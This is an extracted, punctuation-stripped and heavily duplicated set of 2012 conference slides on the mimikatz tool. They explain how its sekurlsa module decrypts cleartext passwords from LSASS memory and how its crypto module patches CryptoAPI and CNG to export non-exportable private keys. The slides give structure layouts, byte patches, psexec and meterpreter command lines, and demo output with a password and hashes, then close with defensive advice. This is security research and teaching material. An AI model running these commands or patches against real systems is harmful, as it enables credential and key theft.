Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
